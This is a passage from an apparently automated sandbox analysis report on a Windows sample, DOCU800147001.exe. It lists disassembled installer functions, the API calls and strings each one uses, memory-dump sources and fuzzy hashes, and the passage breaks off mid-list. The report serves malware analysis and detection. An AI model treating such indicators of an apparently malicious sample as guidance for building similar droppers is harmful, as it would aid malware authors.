                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F$Pantaloons Setup
                                                • API String ID: 941294808-4150938233
                                                • Opcode ID: e71fa4b7cd7db18ec6937c90ef8ef03dc97b1c494a2d0299c5982f2cadabd8f1
                                                • Instruction ID: 1970eda38267bcdb885ac0a700297f93df6a90a6824bbd846fa9b4042a90093d
                                                • Opcode Fuzzy Hash: e71fa4b7cd7db18ec6937c90ef8ef03dc97b1c494a2d0299c5982f2cadabd8f1
                                                • Instruction Fuzzy Hash: DE419A71804249AFCB058F95CD459BFBFB9FF45311F00812AF962AA1A0C738EA50DFA5
                                                Function 004058B2 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrcpyA.KERNEL32(007A0288,NUL,?,00000000,?,00000000,?,00405A56,?,?,00000001,004055F9,?,00000000,000000F1,?), ref: 004058C2
                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A56,?,?,00000001,004055F9,?,00000000,000000F1,?), ref: 004058E6
                                                • GetShortPathNameA.KERNEL32(00000000,007A0288,00000400), ref: 004058EF
                                                  • Part of subcall function 00405770: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 00405780
                                                  • Part of subcall function 00405770: lstrlenA.KERNEL32(0040599F,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 004057B2
                                                • GetShortPathNameA.KERNEL32(?,007A0688,00000400), ref: 0040590C
                                                • wsprintfA.USER32 ref: 0040592A
                                                • GetFileSize.KERNEL32(00000000,00000000,007A0688,C0000000,00000004,007A0688,?,?,?,?,?), ref: 00405965
                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405974
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059AC
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,0079FE88,00000000,-0000000A,0040936C,00000000,[Rename],00000000,00000000,00000000), ref: 00405A02
                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A14
                                                • GlobalFree.KERNEL32(00000000), ref: 00405A1B
                                                • CloseHandle.KERNEL32(00000000), ref: 00405A22
                                                  • Part of subcall function 0040580B: GetFileAttributesA.KERNELBASE(00000003,00402C6B,C:\Users\user\Desktop\DOCU800147001.exe,80000000,00000003), ref: 0040580F
                                                  • Part of subcall function 0040580B: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405831
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                • String ID: %s=%s$NUL$[Rename]
                                                • API String ID: 1265525490-4148678300
                                                • Opcode ID: 984f1eafc83599743fab0d905d1acbbcb7f88393829daf581cda5b9499d27641
                                                • Instruction ID: eaebdebf8796e3850c000fe6eb76ad3f7fb5957efc68c2b36b1b91be42a79c1d
                                                • Opcode Fuzzy Hash: 984f1eafc83599743fab0d905d1acbbcb7f88393829daf581cda5b9499d27641
                                                • Instruction Fuzzy Hash: 6A410271604B09BFD6206B656C8AF6B3A9CDF45755F14063AFE01F22D2DA7CA8008E7D
                                                Function 00405DE5 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DOCU800147001.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,76233410,0040327D), ref: 00405E3D
                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405E4A
                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\DOCU800147001.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,76233410,0040327D), ref: 00405E4F
                                                • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,76233410,0040327D), ref: 00405E5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\DOCU800147001.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-2437539202
                                                • Opcode ID: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
                                                • Instruction ID: 98207d01bde9e00a0eed0430611c531f9d380fb7e7b936b50ef7ef360768d6c7
                                                • Opcode Fuzzy Hash: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
                                                • Instruction Fuzzy Hash: A6110871804B9429F73217248C40B777F98CB56760F18047BE5D5722C2C67C5E828EED
                                                Function 00403ECF Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowLongA.USER32(?,000000EB), ref: 00403EEC
                                                • GetSysColor.USER32(00000000), ref: 00403F08
                                                • SetTextColor.GDI32(?,00000000), ref: 00403F14
                                                • SetBkMode.GDI32(?,?), ref: 00403F20
                                                • GetSysColor.USER32(?), ref: 00403F33
                                                • SetBkColor.GDI32(?,?), ref: 00403F43
                                                • DeleteObject.GDI32(?), ref: 00403F5D
                                                • CreateBrushIndirect.GDI32(?), ref: 00403F67
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                • Instruction ID: bef5c4da8a9fddcda3e14ba796976a45e550bdb17cacbe877f2265ea57743fc9
                                                • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                • Instruction Fuzzy Hash: 47218471904745ABCB219F68DD48F4BBFF8AF01715B048529F896E22E1D738EA04CB55
                                                Function 00402685 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00029400,00000000,40000000,00000002,00000000,00000000), ref: 004026D9
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004026F5
                                                • GlobalFree.KERNEL32(?), ref: 0040272E
                                                • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402740
                                                • GlobalFree.KERNEL32(00000000), ref: 00402747
                                                • CloseHandle.KERNEL32(?), ref: 0040275F
                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402773
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID:
                                                • API String ID: 3294113728-0
                                                • Opcode ID: b20fe8ae616d53666235b5b03e89020effb2b3d8f0f2408822ca5bbbdc11b4e4
                                                • Instruction ID: d2462f277a9bbeab74e05a3ba9edc35ed5f42c1e2e96cac32811c1f7214cd279
                                                • Opcode Fuzzy Hash: b20fe8ae616d53666235b5b03e89020effb2b3d8f0f2408822ca5bbbdc11b4e4
                                                • Instruction Fuzzy Hash: 47319C71C00128BBDF216FA9DD89DAE7A79EF08364F10422AF520772E0C7795C419FA9
                                                Function 00404730 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040474B
                                                • GetMessagePos.USER32 ref: 00404753
                                                • ScreenToClient.USER32(?,?), ref: 0040476D
                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040477F
                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                • Instruction ID: ad1af3c478a57eda8923b13f4794356c9ed70ebf35a35ad09a5ca660a75b0f14
                                                • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                • Instruction Fuzzy Hash: 16015275D40218BADB01DBA4DC45FFEBBBCAF55711F10412BBA10B72C0C7B465018BA5
                                                Function 00402B44 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5F
                                                • MulDiv.KERNEL32(000EADF8,00000064,000EB520), ref: 00402B8A
                                                • wsprintfA.USER32 ref: 00402B9A
                                                • SetWindowTextA.USER32(?,?), ref: 00402BAA
                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBC
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402B94
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 504712adeadd9352c4a14490f0cd0c9c0cfaa5826e6c2da3921648d7ab385779
                                                • Instruction ID: 93a9953827b1cdb6b1926f3dfe8af3c360bd0244c58553ac49039ba424eb549a
                                                • Opcode Fuzzy Hash: 504712adeadd9352c4a14490f0cd0c9c0cfaa5826e6c2da3921648d7ab385779
                                                • Instruction Fuzzy Hash: A8016770940208BBDF209F60DD09FAE3B79BB00304F008039FA06B92D1D7B9A951CF59
                                                Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(?), ref: 00401D29
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                • CreateFontIndirectA.GDI32(0040A7A0), ref: 00401DA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID: Times New Roman
                                                • API String ID: 3808545654-927190056
                                                • Opcode ID: f464e6d0882b5c2191551a389ba8d262eda501ef9214cc2c7c2ee5dc89c7df3b
                                                • Instruction ID: 685ed0ca33fa1d5999e3341403fc008963373260a57280c7a8a131362965c6fe
                                                • Opcode Fuzzy Hash: f464e6d0882b5c2191551a389ba8d262eda501ef9214cc2c7c2ee5dc89c7df3b
                                                • Instruction Fuzzy Hash: DD0162B1958340AFE7015BB09E1AB9B3F74E765305F108479F541B72E2C67854158B2B
                                                Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?), ref: 00401CD0
                                                • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 6a7fd0796aeac66ebd7eda05d6bf607f08eb548159e523f52aa5a656427483f4
                                                • Instruction ID: 854dc7b36677132a153458acbc54d2aec341d78ddb5050a54aa2f8e30eae251c
                                                • Opcode Fuzzy Hash: 6a7fd0796aeac66ebd7eda05d6bf607f08eb548159e523f52aa5a656427483f4
                                                • Instruction Fuzzy Hash: 57F062B2D04114AFE701EBA4DD88CAF77BCEB44301B004576F501F2091C7389D018B79
                                                Function 0040464E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(0079E4F8,0079E4F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040456E,000000DF,0000040F,00000400,00000000), ref: 004046DC
                                                • wsprintfA.USER32 ref: 004046E4
                                                • SetDlgItemTextA.USER32(?,0079E4F8), ref: 004046F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: b375c85bb42af5e6a4a82e1401f3ed5588ebe652851f1932bf97f9dd6594575d
                                                • Instruction ID: cb72ff88f5f2b4ba7204730e7c77314340c58308aab751b64ccb2cc1a1ae2234
                                                • Opcode Fuzzy Hash: b375c85bb42af5e6a4a82e1401f3ed5588ebe652851f1932bf97f9dd6594575d
                                                • Instruction Fuzzy Hash: 6D11087360013437DB0061699C46EAF376DDBC6374F14463BFA29F61D2E979AC1182E9
                                                Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
